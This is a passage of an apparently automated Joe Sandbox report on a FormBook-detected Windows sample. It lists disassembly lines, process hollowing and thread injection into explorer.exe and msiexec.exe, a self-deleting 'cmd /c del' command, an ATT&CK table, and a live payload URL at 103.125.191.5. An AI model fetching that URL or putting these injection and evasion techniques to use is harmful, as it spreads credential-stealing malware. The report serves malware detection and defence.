    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 1_2_1E16A229 mov eax, dword ptr fs:[00000030h]1_2_1E16A229
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 1_2_1E16A229 mov eax, dword ptr fs:[00000030h]1_2_1E16A229
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 1_2_1E16A229 mov eax, dword ptr fs:[00000030h]1_2_1E16A229
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 1_2_1E16A229 mov eax, dword ptr fs:[00000030h]1_2_1E16A229
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 1_2_1E16A229 mov eax, dword ptr fs:[00000030h]1_2_1E16A229
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 1_2_1E16A229 mov eax, dword ptr fs:[00000030h]1_2_1E16A229
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 1_2_1E16A229 mov eax, dword ptr fs:[00000030h]1_2_1E16A229
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 1_2_1E16A229 mov eax, dword ptr fs:[00000030h]1_2_1E16A229
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 1_2_1E218A62 mov eax, dword ptr fs:[00000030h]1_2_1E218A62
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 1_2_1E1D4257 mov eax, dword ptr fs:[00000030h]1_2_1E1D4257
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 1_2_1E149240 mov eax, dword ptr fs:[00000030h]1_2_1E149240
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 1_2_1E149240 mov eax, dword ptr fs:[00000030h]1_2_1E149240
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 1_2_1E149240 mov eax, dword ptr fs:[00000030h]1_2_1E149240
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 1_2_1E149240 mov eax, dword ptr fs:[00000030h]1_2_1E149240
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 1_2_1E18927A mov eax, dword ptr fs:[00000030h]1_2_1E18927A
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 1_2_1E20EA55 mov eax, dword ptr fs:[00000030h]1_2_1E20EA55
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 1_2_1E1FB260 mov eax, dword ptr fs:[00000030h]1_2_1E1FB260
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 1_2_1E1FB260 mov eax, dword ptr fs:[00000030h]1_2_1E1FB260
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 1_2_1E17D294 mov eax, dword ptr fs:[00000030h]1_2_1E17D294
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 1_2_1E17D294 mov eax, dword ptr fs:[00000030h]1_2_1E17D294
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 1_2_1E15AAB0 mov eax, dword ptr fs:[00000030h]1_2_1E15AAB0
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 1_2_1E15AAB0 mov eax, dword ptr fs:[00000030h]1_2_1E15AAB0
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 1_2_1E17FAB0 mov eax, dword ptr fs:[00000030h]1_2_1E17FAB0
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 1_2_1E1452A5 mov eax, dword ptr fs:[00000030h]1_2_1E1452A5
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 1_2_1E1452A5 mov eax, dword ptr fs:[00000030h]1_2_1E1452A5
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 1_2_1E1452A5 mov eax, dword ptr fs:[00000030h]1_2_1E1452A5
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 1_2_1E1452A5 mov eax, dword ptr fs:[00000030h]1_2_1E1452A5
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 1_2_1E1452A5 mov eax, dword ptr fs:[00000030h]1_2_1E1452A5
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 1_2_1E172ACB mov eax, dword ptr fs:[00000030h]1_2_1E172ACB
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 1_2_1E172AE4 mov eax, dword ptr fs:[00000030h]1_2_1E172AE4
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 1_2_1E20131B mov eax, dword ptr fs:[00000030h]1_2_1E20131B
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 1_2_1E14F358 mov eax, dword ptr fs:[00000030h]1_2_1E14F358
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 1_2_1E14DB40 mov eax, dword ptr fs:[00000030h]1_2_1E14DB40
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 1_2_1E173B7A mov eax, dword ptr fs:[00000030h]1_2_1E173B7A
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 1_2_1E173B7A mov eax, dword ptr fs:[00000030h]1_2_1E173B7A
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 1_2_1E14DB60 mov ecx, dword ptr fs:[00000030h]1_2_1E14DB60
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 1_2_1E218B58 mov eax, dword ptr fs:[00000030h]1_2_1E218B58
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 1_2_1E172397 mov eax, dword ptr fs:[00000030h]1_2_1E172397
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 1_2_1E215BA5 mov eax, dword ptr fs:[00000030h]1_2_1E215BA5
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 1_2_1E17B390 mov eax, dword ptr fs:[00000030h]1_2_1E17B390
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 1_2_1E151B8F mov eax, dword ptr fs:[00000030h]1_2_1E151B8F
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 1_2_1E151B8F mov eax, dword ptr fs:[00000030h]1_2_1E151B8F
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 1_2_1E1FD380 mov ecx, dword ptr fs:[00000030h]1_2_1E1FD380
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 1_2_1E20138A mov eax, dword ptr fs:[00000030h]1_2_1E20138A
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 1_2_1E174BAD mov eax, dword ptr fs:[00000030h]1_2_1E174BAD
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 1_2_1E174BAD mov eax, dword ptr fs:[00000030h]1_2_1E174BAD
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 1_2_1E174BAD mov eax, dword ptr fs:[00000030h]1_2_1E174BAD
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 1_2_1E1C53CA mov eax, dword ptr fs:[00000030h]1_2_1E1C53CA
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 1_2_1E1C53CA mov eax, dword ptr fs:[00000030h]1_2_1E1C53CA
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 1_2_1E1703E2 mov eax, dword ptr fs:[00000030h]1_2_1E1703E2
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 1_2_1E1703E2 mov eax, dword ptr fs:[00000030h]1_2_1E1703E2
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 1_2_1E1703E2 mov eax, dword ptr fs:[00000030h]1_2_1E1703E2
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 1_2_1E1703E2 mov eax, dword ptr fs:[00000030h]1_2_1E1703E2
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 1_2_1E1703E2 mov eax, dword ptr fs:[00000030h]1_2_1E1703E2
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 1_2_1E1703E2 mov eax, dword ptr fs:[00000030h]1_2_1E1703E2
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 1_2_1E16DBE9 mov eax, dword ptr fs:[00000030h]1_2_1E16DBE9
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 1_2_1E1C7016 mov eax, dword ptr fs:[00000030h]1_2_1E1C7016
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 1_2_1E1C7016 mov eax, dword ptr fs:[00000030h]1_2_1E1C7016
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 1_2_1E1C7016 mov eax, dword ptr fs:[00000030h]1_2_1E1C7016
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 1_2_1E16A830 mov eax, dword ptr fs:[00000030h]1_2_1E16A830
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 1_2_1E16A830 mov eax, dword ptr fs:[00000030h]1_2_1E16A830
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 1_2_1E16A830 mov eax, dword ptr fs:[00000030h]1_2_1E16A830
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 1_2_1E16A830 mov eax, dword ptr fs:[00000030h]1_2_1E16A830
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 1_2_1E214015 mov eax, dword ptr fs:[00000030h]1_2_1E214015
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 1_2_1E214015 mov eax, dword ptr fs:[00000030h]1_2_1E214015
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 1_2_1E17002D mov eax, dword ptr fs:[00000030h]1_2_1E17002D
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 1_2_1E17002D mov eax, dword ptr fs:[00000030h]1_2_1E17002D
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 1_2_1E17002D mov eax, dword ptr fs:[00000030h]1_2_1E17002D
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 1_2_1E17002D mov eax, dword ptr fs:[00000030h]1_2_1E17002D
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 1_2_1E17002D mov eax, dword ptr fs:[00000030h]1_2_1E17002D
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 1_2_1E15B02A mov eax, dword ptr fs:[00000030h]1_2_1E15B02A
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 1_2_1E15B02A mov eax, dword ptr fs:[00000030h]1_2_1E15B02A
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 1_2_1E15B02A mov eax, dword ptr fs:[00000030h]1_2_1E15B02A
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 1_2_1E15B02A mov eax, dword ptr fs:[00000030h]1_2_1E15B02A
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 1_2_1E160050 mov eax, dword ptr fs:[00000030h]1_2_1E160050
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 1_2_1E160050 mov eax, dword ptr fs:[00000030h]1_2_1E160050
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 1_2_1E202073 mov eax, dword ptr fs:[00000030h]1_2_1E202073
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 1_2_1E211074 mov eax, dword ptr fs:[00000030h]1_2_1E211074
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 1_2_1E149080 mov eax, dword ptr fs:[00000030h]1_2_1E149080
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 1_2_1E1C3884 mov eax, dword ptr fs:[00000030h]1_2_1E1C3884
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 1_2_1E1C3884 mov eax, dword ptr fs:[00000030h]1_2_1E1C3884
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 1_2_1E17F0BF mov ecx, dword ptr fs:[00000030h]1_2_1E17F0BF
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 1_2_1E17F0BF mov eax, dword ptr fs:[00000030h]1_2_1E17F0BF
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 1_2_1E17F0BF mov eax, dword ptr fs:[00000030h]1_2_1E17F0BF
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 1_2_1E1890AF mov eax, dword ptr fs:[00000030h]1_2_1E1890AF
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 1_2_1E1720A0 mov eax, dword ptr fs:[00000030h]1_2_1E1720A0
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 1_2_1E1720A0 mov eax, dword ptr fs:[00000030h]1_2_1E1720A0
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 1_2_1E1720A0 mov eax, dword ptr fs:[00000030h]1_2_1E1720A0
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 1_2_1E1720A0 mov eax, dword ptr fs:[00000030h]1_2_1E1720A0
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 1_2_1E1720A0 mov eax, dword ptr fs:[00000030h]1_2_1E1720A0
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 1_2_1E1720A0 mov eax, dword ptr fs:[00000030h]1_2_1E1720A0
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 1_2_1E1DB8D0 mov eax, dword ptr fs:[00000030h]1_2_1E1DB8D0
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 1_2_1E1DB8D0 mov ecx, dword ptr fs:[00000030h]1_2_1E1DB8D0
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 1_2_1E1DB8D0 mov eax, dword ptr fs:[00000030h]1_2_1E1DB8D0
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 1_2_1E1DB8D0 mov eax, dword ptr fs:[00000030h]1_2_1E1DB8D0
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 1_2_1E1DB8D0 mov eax, dword ptr fs:[00000030h]1_2_1E1DB8D0
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 1_2_1E1DB8D0 mov eax, dword ptr fs:[00000030h]1_2_1E1DB8D0
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 1_2_1E1440E1 mov eax, dword ptr fs:[00000030h]1_2_1E1440E1
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 1_2_1E1440E1 mov eax, dword ptr fs:[00000030h]1_2_1E1440E1
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 1_2_1E1440E1 mov eax, dword ptr fs:[00000030h]1_2_1E1440E1
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 1_2_1E1458EC mov eax, dword ptr fs:[00000030h]1_2_1E1458EC
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 1_2_1E149100 mov eax, dword ptr fs:[00000030h]1_2_1E149100
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 1_2_1E149100 mov eax, dword ptr fs:[00000030h]1_2_1E149100
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 1_2_1E149100 mov eax, dword ptr fs:[00000030h]1_2_1E149100
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 1_2_1E17513A mov eax, dword ptr fs:[00000030h]1_2_1E17513A
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 1_2_1E17513A mov eax, dword ptr fs:[00000030h]1_2_1E17513A
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 1_2_1E164120 mov eax, dword ptr fs:[00000030h]1_2_1E164120
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 1_2_1E164120 mov eax, dword ptr fs:[00000030h]1_2_1E164120
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 1_2_1E164120 mov eax, dword ptr fs:[00000030h]1_2_1E164120
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 1_2_1E164120 mov eax, dword ptr fs:[00000030h]1_2_1E164120
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 1_2_1E164120 mov ecx, dword ptr fs:[00000030h]1_2_1E164120
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 1_2_1E16B944 mov eax, dword ptr fs:[00000030h]1_2_1E16B944
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 1_2_1E16B944 mov eax, dword ptr fs:[00000030h]1_2_1E16B944
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 1_2_1E14B171 mov eax, dword ptr fs:[00000030h]1_2_1E14B171
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 1_2_1E14B171 mov eax, dword ptr fs:[00000030h]1_2_1E14B171
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 1_2_1E14C962 mov eax, dword ptr fs:[00000030h]1_2_1E14C962
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 1_2_1E2049A4 mov eax, dword ptr fs:[00000030h]1_2_1E2049A4
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 1_2_1E2049A4 mov eax, dword ptr fs:[00000030h]1_2_1E2049A4
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 1_2_1E2049A4 mov eax, dword ptr fs:[00000030h]1_2_1E2049A4
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 1_2_1E2049A4 mov eax, dword ptr fs:[00000030h]1_2_1E2049A4
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 1_2_1E172990 mov eax, dword ptr fs:[00000030h]1_2_1E172990
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 1_2_1E17A185 mov eax, dword ptr fs:[00000030h]1_2_1E17A185
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 1_2_1E16C182 mov eax, dword ptr fs:[00000030h]1_2_1E16C182
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 1_2_1E1C51BE mov eax, dword ptr fs:[00000030h]1_2_1E1C51BE
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 1_2_1E1C51BE mov eax, dword ptr fs:[00000030h]1_2_1E1C51BE
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 1_2_1E1C51BE mov eax, dword ptr fs:[00000030h]1_2_1E1C51BE
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 1_2_1E1C51BE mov eax, dword ptr fs:[00000030h]1_2_1E1C51BE
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 1_2_1E1699BF mov ecx, dword ptr fs:[00000030h]1_2_1E1699BF
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 1_2_1E1699BF mov ecx, dword ptr fs:[00000030h]1_2_1E1699BF
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 1_2_1E1699BF mov eax, dword ptr fs:[00000030h]1_2_1E1699BF
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 1_2_1E1699BF mov ecx, dword ptr fs:[00000030h]1_2_1E1699BF
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 1_2_1E1699BF mov ecx, dword ptr fs:[00000030h]1_2_1E1699BF
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 1_2_1E1699BF mov eax, dword ptr fs:[00000030h]1_2_1E1699BF
    Source: C:\Users\user\Desktop\2eD17GZuWs.exe; Process token adjusted: Debug
    Source: C:\Windows\SysWOW64\msiexec.exe; Process token adjusted: Debug

    HIPS / PFW / Operating System Protection Evasion:

    Maps a DLL or memory area into another process
    Source: C:\Users\user\Desktop\2eD17GZuWs.exe; Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
    Source: C:\Users\user\Desktop\2eD17GZuWs.exe; Section loaded: unknown target: C:\Windows\SysWOW64\msiexec.exe protection: execute and read and write
    Modifies the context of a thread in another process (thread injection)
    Source: C:\Users\user\Desktop\2eD17GZuWs.exe; Thread register set: target process: 3424
    Queues an APC in another process (thread injection)
    Source: C:\Users\user\Desktop\2eD17GZuWs.exe; Thread APC queued: target process: C:\Windows\explorer.exe
    Sample uses process hollowing technique
    Source: C:\Users\user\Desktop\2eD17GZuWs.exe; Section unmapped: C:\Windows\SysWOW64\msiexec.exe base address: 1240000
    Source: C:\Users\user\Desktop\2eD17GZuWs.exe; Process created: C:\Users\user\Desktop\2eD17GZuWs.exe 'C:\Users\user\Desktop\2eD17GZuWs.exe'
    Source: C:\Windows\SysWOW64\msiexec.exe; Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\2eD17GZuWs.exe'
    Source: explorer.exe, 0000000A.00000000.882628410.0000000000AD8000.00000004.00000020.sdmp; Binary or memory string: ProgmanMD6
    Source: explorer.exe, 0000000A.00000002.932560185.0000000001080000.00000002.00000001.sdmp, msiexec.exe, 0000000D.00000002.932857617.0000000003960000.00000002.00000001.sdmp; Binary or memory string: Program Manager
    Source: explorer.exe, 0000000A.00000002.932560185.0000000001080000.00000002.00000001.sdmp, msiexec.exe, 0000000D.00000002.932857617.0000000003960000.00000002.00000001.sdmp; Binary or memory string: Shell_TrayWnd
    Source: explorer.exe, 0000000A.00000002.932560185.0000000001080000.00000002.00000001.sdmp, msiexec.exe, 0000000D.00000002.932857617.0000000003960000.00000002.00000001.sdmp; Binary or memory string: Progman
    Source: explorer.exe, 0000000A.00000002.932560185.0000000001080000.00000002.00000001.sdmp, msiexec.exe, 0000000D.00000002.932857617.0000000003960000.00000002.00000001.sdmp; Binary or memory string: Progmanlock
    Source: explorer.exe, 0000000A.00000000.896282281.000000000A716000.00000004.00000001.sdmp; Binary or memory string: Shell_TrayWnd5D

    Stealing of Sensitive Information:

    Yara detected FormBook
    Source: Yara match; File source: 00000001.00000002.928588896.0000000002550000.00000040.00000001.sdmp, type: MEMORY
    Source: Yara match; File source: 00000001.00000002.927894177.00000000000A0000.00000040.00000001.sdmp, type: MEMORY
    Source: Yara match; File source: 0000000D.00000002.931871202.0000000001100000.00000040.00000001.sdmp, type: MEMORY
    Yara detected Generic Dropper
    Source: Yara match; File source: Process Memory Space: 2eD17GZuWs.exe PID: 2936, type: MEMORY
    Source: Yara match; File source: Process Memory Space: msiexec.exe PID: 6680, type: MEMORY

    Remote Access Functionality:

    Yara detected FormBook
    Source: Yara match; File source: 00000001.00000002.928588896.0000000002550000.00000040.00000001.sdmp, type: MEMORY
    Source: Yara match; File source: 00000001.00000002.927894177.00000000000A0000.00000040.00000001.sdmp, type: MEMORY
    Source: Yara match; File source: 0000000D.00000002.931871202.0000000001100000.00000040.00000001.sdmp, type: MEMORY

    Mitre Att&ck Matrix

    Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact
    Valid Accounts | Shared Modules 1 | DLL Side-Loading 1 | Process Injection 412 | Virtualization/Sandbox Evasion 21 | OS Credential Dumping | Security Software Discovery 621 | Remote Services | Archive Collected Data 1 | Exfiltration Over Other Network Medium | Encrypted Channel 1 | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | Modify System Partition
    Default Accounts | Scheduled Task/Job | Boot or Logon Initialization Scripts | DLL Side-Loading 1 | Process Injection 412 | LSASS Memory | Virtualization/Sandbox Evasion 21 | Remote Desktop Protocol | Data from Removable Media | Exfiltration Over Bluetooth | Ingress Tool Transfer 1 | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout
    Domain Accounts | At (Linux) | Logon Script (Windows) | Logon Script (Windows) | Deobfuscate/Decode Files or Information 1 | Security Account Manager | Process Discovery 2 | SMB/Windows Admin Shares | Data from Network Shared Drive | Automated Exfiltration | Non-Application Layer Protocol 1 | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data
    Local Accounts | At (Windows) | Logon Script (Mac) | Logon Script (Mac) | Obfuscated Files or Information 3 | NTDS | System Information Discovery 21 | Distributed Component Object Model | Input Capture | Scheduled Transfer | Application Layer Protocol 11 | SIM Card Swap | | Carrier Billing Fraud
    Cloud Accounts | Cron | Network Logon Script | Network Logon Script | DLL Side-Loading 1 | LSA Secrets | Remote System Discovery | SSH | Keylogging | Data Transfer Size Limits | Fallback Channels | Manipulate Device Communication | | Manipulate App Store Rankings or Ratings

    Antivirus, Machine Learning and Genetic Malware Detection

    Initial Sample

    Source | Detection | Scanner | Label
    2eD17GZuWs.exe | 25% | Virustotal |
    2eD17GZuWs.exe | 2% | ReversingLabs |

    Dropped Files

    No Antivirus matches

    Unpacked PE Files

    No Antivirus matches

    Domains

    No Antivirus matches

    URLs


    Domains and IPs

    Contacted Domains

    No contacted domains info

    Contacted URLs

    Name | Malicious | Antivirus Detection | Reputation
    http://103.125.191.5/bin_xMjelaYnr43.bin | true | Avira URL Cloud: safe | unknown

    URLs from Memory and Binaries

    Name | Source | Malicious | Antivirus Detection | Reputation
    http://www.apache.org/licenses/LICENSE-2.0 | explorer.exe, 0000000A.00000000.899103858.000000000B976000.00000002.00000001.sdmp | false |  | high
    http://www.fontbureau.com | explorer.exe, 0000000A.00000000.899103858.000000000B976000.00000002.00000001.sdmp | false |  | high
    http://www.fontbureau.com/designersG | explorer.exe, 0000000A.00000000.899103858.000000000B976000.00000002.00000001.sdmp | false |  | high
    http://www.fontbureau.com/designers/? | explorer.exe, 0000000A.00000000.899103858.000000000B976000.00000002.00000001.sdmp | false |  | high
    http://www.founder.com.cn/cn/bThe | explorer.exe, 0000000A.00000000.899103858.000000000B976000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
    http://www.fontbureau.com/designers? | explorer.exe, 0000000A.00000000.899103858.000000000B976000.00000002.00000001.sdmp | false |  | high
    http://www.tiro.com | explorer.exe, 0000000A.00000000.899103858.000000000B976000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
    http://103.125.191.5/bin_xMjelaYnr43.binY | 2eD17GZuWs.exe, 00000001.00000002.928446229.0000000000924000.00000004.00000020.sdmp | false | Avira URL Cloud: safe | unknown
    http://www.fontbureau.com/designers | explorer.exe, 0000000A.00000000.899103858.000000000B976000.00000002.00000001.sdmp | false |  | high
    http://www.goodfont.co.kr | explorer.exe, 0000000A.00000000.899103858.000000000B976000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
    http://www.carterandcone.coml | explorer.exe, 0000000A.00000000.899103858.000000000B976000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
    http://www.sajatypeworks.com | explorer.exe, 0000000A.00000000.899103858.000000000B976000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
    http://www.typography.netD | explorer.exe, 0000000A.00000000.899103858.000000000B976000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
    http://www.fontbureau.com/designers/cabarga.htmlN | explorer.exe, 0000000A.00000000.899103858.000000000B976000.00000002.00000001.sdmp | false |  | high
    http://www.founder.com.cn/cn/cThe | explorer.exe, 0000000A.00000000.899103858.000000000B976000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
    http://www.galapagosdesign.com/staff/dennis.htm | explorer.exe, 0000000A.00000000.899103858.000000000B976000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
    http://fontfabrik.com | explorer.exe, 0000000A.00000000.899103858.000000000B976000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
    http://www.founder.com.cn/cn | explorer.exe, 0000000A.00000000.899103858.000000000B976000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
    http://www.fontbureau.com/designers/frere-user.html | explorer.exe, 0000000A.00000000.899103858.000000000B976000.00000002.00000001.sdmp | false |  | high
    http://103.125.191.5/ | 2eD17GZuWs.exe, 00000001.00000002.928458563.000000000093D000.00000004.00000020.sdmp | false | 4%, Virustotal; Avira URL Cloud: safe | unknown
    http://www.jiyu-kobo.co.jp/ | explorer.exe, 0000000A.00000000.899103858.000000000B976000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
    https://in_xMjelaYnr43.bin | 2eD17GZuWs.exe, 00000001.00000002.928394579.00000000008F7000.00000004.00000020.sdmp | false | Avira URL Cloud: safe | low
    http://www.galapagosdesign.com/DPlease | explorer.exe, 0000000A.00000000.899103858.000000000B976000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
    http://www.fontbureau.com/designers8 | explorer.exe, 0000000A.00000000.899103858.000000000B976000.00000002.00000001.sdmp | false |  | high
    http://www.%s.comPA | explorer.exe, 0000000A.00000002.935388452.0000000002B50000.00000002.00000001.sdmp | false | URL Reputation: safe | low
    http://www.fonts.com | explorer.exe, 0000000A.00000000.899103858.000000000B976000.00000002.00000001.sdmp | false |  | high
    http://www.sandoll.co.kr | explorer.exe, 0000000A.00000000.899103858.000000000B976000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
    http://www.urwpp.deDPlease | explorer.exe, 0000000A.00000000.899103858.000000000B976000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
    http://www.zhongyicts.com.cn | explorer.exe, 0000000A.00000000.899103858.000000000B976000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
    http://www.sakkal.com | explorer.exe, 0000000A.00000000.899103858.000000000B976000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown

                        Contacted IPs


                        Public

                        IP | Domain | Country | ASN | ASN Name | Malicious
                        103.125.191.5 | unknown | Viet Nam | 135905 | VNPT-AS-VNVIETNAMPOSTSANDTELECOMMUNICATIONSGROUPVN | true

                        General Information

                        Joe Sandbox Version: 31.0.0 Red Diamond
                        Analysis ID: 320425
